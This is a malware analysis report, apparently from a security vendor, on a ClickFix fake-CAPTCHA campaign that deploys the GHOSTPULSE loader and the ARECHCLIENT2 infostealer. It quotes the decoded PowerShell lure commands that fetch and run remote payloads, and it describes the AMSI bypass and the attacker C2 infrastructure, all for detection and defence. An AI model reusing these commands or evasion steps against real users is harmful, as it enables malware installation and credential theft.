A Wretch Client: From ClickFix deception to information stealer deployment

Preamble

Elastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various malware through social engineering tactics.

Our threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary initial access vector. This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution. Our telemetry has tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led to campaigns targeting a broad audience using malware and infostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019 but now experiencing a significant surge in popularity.

This post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malware it ultimately delivers.

Key takeaways

• ClickFix: Remains a highly effective and prevalent initial access method.
• GHOSTPULSE: Continues to be widely used as a multi-stage payload loader, featuring ongoing development with new modules and improved evasion techniques. Notably, its initial configuration is delivered within an encrypted file.
• ARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.

The Initial Hook: Deconstructing ClickFix's Social Engineering

Every successful multi-stage attack begins with a foothold, and in many recent campaigns, that initial step has been satisfied by ClickFix. ClickFix leverages human psychology, transforming seemingly innocuous user interactions into the very launchpad for compromise.

At its core, ClickFix is a social engineering technique designed to manipulate users into inadvertently executing malicious code on their systems. It preys on common online behaviors and psychological tendencies, presenting users with deceptive prompts – often disguised as browser updates, system errors, or even CAPTCHA verifications. The trick is simple yet incredibly effective: instead of a direct download, the user is instructed to copy a seemingly harmless "fix" (which is a malicious PowerShell command) and paste it directly into their operating system's run dialog. This seemingly voluntary action bypasses many traditional perimeter defenses, as the user initiates the process.

ClickFix first emerged on the threat landscape in March 2024, but it has rapidly gained traction, exploding in prevalence throughout 2024 and continuing its aggressive ascent into 2025. Its effectiveness lies in exploiting "verification fatigue" – the subconscious habit users develop of mindlessly clicking through security checks. When confronted with a familiar-looking CAPTCHA or an urgent "fix it" button, many users, conditioned by routine, simply comply without scrutinizing the underlying request. This makes ClickFix an incredibly potent initial access vector, favored by a broad spectrum of threat actors due to its high success rate in breaching initial defenses.

Our recent Elastic Security research on EDDIESTEALER provides another concrete example of ClickFix's efficacy in facilitating malware deployment, further underscoring its versatility and widespread adoption in the threat landscape.

Our internal telemetry at Elastic corroborates this trend, showing a significant volume in ClickFix-related alerts across our observed environments, particularly within Q1 2025. We've noted an increase in attempts compared to the previous quarter, with a predominant focus on the deployment of mass infection malware, such as RATs and InfoStealers.

A ClickFix Campaign's Journey to ARECHCLIENT2

The ClickFix technique often serves as the initial step in a larger, multi-stage attack. We've recently analyzed a campaign that clearly shows this progression. This operation begins with a ClickFix lure, which tricks users into starting the infection process. After gaining initial access, the campaign deploys an updated version of the GHOSTPULSE Loader (also known as HIJACKLOADER, IDATLOADER). This loader then brings in an intermediate .NET loader. This additional stage is responsible for delivering the final payload: an ARECHCLIENT2 (SECTOPRAT) sample, loaded directly into memory. This particular attack chain demonstrates how adversaries combine social engineering with hidden loader capabilities and multiple execution layers to steal data and gain remote control ultimately.

We observed this exact campaign in our telemetry on , providing us with a direct look into its real-world execution and the sequence of its components.

Technical analysis of the infection

The infection chain begins with a phishing page that imitates a Cloudflare anti-DDoS Captcha verification.

We observed two infrastructures (both resolving to 50.57.243[.]90) https://clients[.]dealeronlinemarketing[[.]]com/captcha/ and https://clients[.]contology[.]com/captcha/ that deliver the same initial payload.

User interaction on this page initiates execution. GHOSTPULSE serves as the malware loader in this campaign. Elastic Security Labs has been closely tracking this loader, and our previous research (2023 and 2024) provided a detailed look into its initial capabilities.

The webpage is a heavily obfuscated JavaScript script that generates the HTML code and JavaScript, which copies a PowerShell command to the clipboard.

Inspecting the runtime HTML code in a browser, we can see the front end of the page, but not the script that is run after clicking on the checkbox Verify you are human.

A simple solution is to run it in a debugger to retrieve the information during execution. The second JS code is obfuscated, but we can easily identify two interesting functions. The first function, runClickedCheckboxEffects, retrieves the public IP address of the machine by querying https://api.ipify[.]org?format=json, then it sends the IP address to the attacker’s infrastructure, https://koonenmagaziner[.]click/counter/<IP_address>, to log the infection.

The second function copies a base64-encoded PowerShell command to the clipboard.

Which is the following when it is base64 decoded

(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' 
    -UseBasicParsing).content | iex

When executed, it fetches the following PowerShell script:

Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile 
    "$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path 
    "$env:TEMP/ComponentStyle.zip" -DestinationPath 
    "$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"

The observed infection process for this campaign involves GHOSTPULSE's deployment as follows: After the user executes the PowerShell command copied by ClickFix, the initial script fetches and runs additional commands. These PowerShell commands download a ZIP file (ComponentStyle.zip) from a remote location and then extract it into a temporary directory on the victim's system.

Extracted contents include components for GHOSTPULSE, specifically a benign executable (Crysta_X64.exe) and a malicious dynamic-link library (DllXDownloadManager.dll). This setup utilizes DLL sideloading, a technique in which the legitimate executable loads the malicious DLL. The file (Heeschamjet.rc) is the IDAT file that contains the next stage's payloads in an encrypted format

and the file Shonomteak.bxi, which is encrypted and used by the loader to fetch the stage 2 and configuration structure.

GHOSTPULSE

Stage 1

GHOSTPULSE is malware dating back to 2023. It has continuously received numerous updates, including a new way to store its encrypted payload in an image by embedding the payload in the PNG’s pixels, as detailed in Elastic’s 2024 research blog post, and new modules from Zscaler research.

The malware used in this campaign was shipped with an additional encrypted file named Shonomteak.bxi. During stage 1 of the loader, it decrypts the file using a DWORD addition operation with a value stored in the file itself.

The malware then extracts the stage 2 code from the decrypted file Shonomteak.bxi and injects it into a loaded library using the LibraryLoadA function. The library name is stored in the same decrypted file; in our case, it is vssapi.dll.

The stage 2 function is then called with a structure parameter containing the filename of the IDAT PNG file, the stage 2 configuration that was inside the decrypted Shonomteak.bxi, and a boolean field b_detect_process set to True in our case.

Stage 2

When the boolean field b_detect_process is set to True, the malware executes a function that checks for a list of processes to see if they are running. If a process is detected, execution is delayed by 5 seconds.

In previous samples, we analyzed GHOSTPULSE, which had its configuration hardcoded directly in the binary. This sample, on the other hand, has all the necessary information required for the malware to function properly, stored in Shonomteak.bxi, including:

• Hashes for the DLL names and Windows APIs
• IDAT tag: used to find the start of the encrypted data in the PNG file
• IDAT string: Which is simply “IDAT”
• Hashes of processes to scan for

Final thoughts on GHOSTPULSE

GHOSTPULSE has seen multiple updates. The use of the IDAT header method to store the encrypted payload, rather than the new method we discovered in 2024, which utilizes pixels to store the payload, may indicate that the builder of this family maintained both options for compiling new samples.

Our configuration extractor performs payload extraction using both methods and can be used for mass analysis on samples. You can find the updated tool in our labs-releases repository.

ARECHCLIENT2

In 2025, a notable increase in activity involving ARECHCLIENT2 (SectopRAT) was observed. This heavily obfuscated .NET remote access tool, initially identified in November 2019 and known for its information-stealing features, is now being deployed by GHOSTPULSE through the Clickfix social engineering technique. Our prior research documented the initial deployment of GHOSTPULSE utilizing ARECHCLIENT2 around 2023.

The payload deployed by GHOSTPULSE in a newly created process is an x86 native .NET loader, which in its turn loads ARECHCLIENT2.

The loader goes through 3 steps:

• Patching AMSI
• Extracting and decrypting the payload
• Loading the CLR, then reflectively loading ARECHCLIENT2

Interestingly, its error handling for debugging purposes is still present, in the form of message boxes using the MessageBoxA API, for example, when failing to find the .tls section, an error message box with the string "D1" is displayed.

The following is a table of all the error messages and their description:

The malware sets up a hook on the LoadLibraryExW API. This hook waits for amsi.dll to be loaded, then sets another hook on AmsiScanBuffer 0, effectively bypassing AMSI.

After this, the loader fetches the pointer in memory to the .tls section by parsing the PE headers. The first 0x40 bytes of this section serve as the XOR key, and the rest of the bytes contain the encrypted ARECHCLIENT2 sample, which the loader then decrypts.

Finally, it loads the .NET Common Language Runtime (CLR) in memory with CLRCreateInstance Windows API before reflectively loading ARECHCLIENT2. The following is an example of how it is performed.

ARECHCLIENT2 is a potent remote access trojan and infostealer, designed to target a broad spectrum of sensitive user data and system information. The malware's core objectives primarily focus on:

• Credential and Financial Theft: ARECHCLIENT2 explicitly targets cryptocurrency wallets, browser-saved passwords, cookies, and autofill data. It also aims for credentials from FTP, VPN, Telegram, Discord, and Steam.

• System Profiling and Reconnaissance: ARECHCLIENT2 gathers extensive system details, including the operating system version, hardware information, IP address, machine name, and geolocation (city, country, and time zone).

• Command Execution: ARECHCLIENT2 receives and executes commands from its command-and-control (C2) server, granting attackers remote control over infected systems.

The ARECHCLIENT2 malware connects to its C2 144.172.97[.]2, which is hardcoded in the binary as an encrypted string, and also retrieves its secondary C2 (143.110.230[.]167) IP from a hardcoded pastebin link https://pastebin[.]com/raw/Wg8DHh2x.

Infrastructure analysis

The malicious captcha page was hosted under two domains clients.dealeronlinemarketing[.]com and clients.contology[.]com under the URI /captcha and /Client pointing to the following IP address 50.57.243[.]90.

We've identified that both entities are linked to a digital advertising agency with a long operational history. Further investigation reveals that the company has consistently utilized client subdomains to host various content, including PDFs and forms, for advertising purposes.

We assess that the attacker has likely compromised the server 50.57.243[.]90 and is leveraging it by exploiting the company's existing infrastructure and advertising reach to facilitate widespread malicious activity.

Further down the attack chain, analysis of the ARECHCLIENT2 C2 IPs (143.110.230[.]167 and 144.172.97[.]2) revealed additional campaign infrastructure. Both servers are hosted on different autonomous systems, AS14061 and AS14956.

Pivoting on a shared banner hash (@ValidinLLC’s HOST-BANNER_0_HASH, which is the hash value of the web server response banners) revealed 120 unique servers across a range of autonomous systems over the last seven months. Of these 120, 19 have been previously labeled by various other vendors as “Sectop RAT" (aka ARECHCLIENT2) as documented in the maltrail repo.

Performing focused validations of the latest occurrences (first occurrence after June 1, 2025) against VirusTotal shows community members have previously labeled all 13 as Sectop RAT C2.

All these servers have similar configurations:

• Running Canonical Linux
• SSH on 22
• Unknown TCP on 443
• Nginx HTTP on 8080, and
• HTTP on 9000 (C2 port)

The service on port 9000 has Windows server headers, whereas the SSH and NGINX HTTP services both specify Ubuntu as the operating system. This suggests a reverse proxy of the C2 to protect the actual server by maintaining disposable front-end redirectors.

ARECHCLIENT2 IOC:

• HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20

This is an active campaign, and this infrastructure is being built and torn down at a high cadence over the last seven months. As of publication, the following C2 nodes are still active:

Conclusion

This multi-stage cyber campaign effectively leverages ClickFix social engineering for initial access, deploying the GHOSTPULSE loader to deliver an intermediate .NET loader, ultimately culminating in the memory-resident ARECHCLIENT2 payload. This layered attack chain gathers extensive credentials, financial, and system data, while also granting attackers remote control capabilities over compromised machines.

MITRE ATT&CK

Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.

Tactics

Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.

• Initial Access
• Execution
• Defense Evasion
• Command and Control
• Collection

Techniques

Techniques represent how an adversary achieves a tactical goal by performing an action.

• Phishing
  • Spearphishing Link User Execution
  • Malicious Link
  • Malicious File
• Command and Scripting Interpreter
  • PowerShell
  • Deobfuscation/Decoding
• DLL Sideloading
• Reflective Loading
• User Interaction
• Ingress Tool Transfer
• System Information Discovery
• Process Discovery
• Steal Web Session Cookie

Detecting [malware]

Detection

Elastic Defend detects this threat with the following behavior protection rules:

• Suspicious Command Shell Execution via Windows Run
• DNS Query to Suspicious Top Level Domain
• Library Load of a File Written by a Signed Binary Proxy
• Connection to WebService by a Signed Binary Proxy
• Potential Browser Information Discovery

YARA

• Windows_Trojan_GhostPulse
• Windows_Trojan_Arechclient2

Observations

The following observables were discussed in this research.

References

The following were referenced throughout the above research:

• https://x.com/SI_FalconTeam/status/1915790796948643929
• https://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics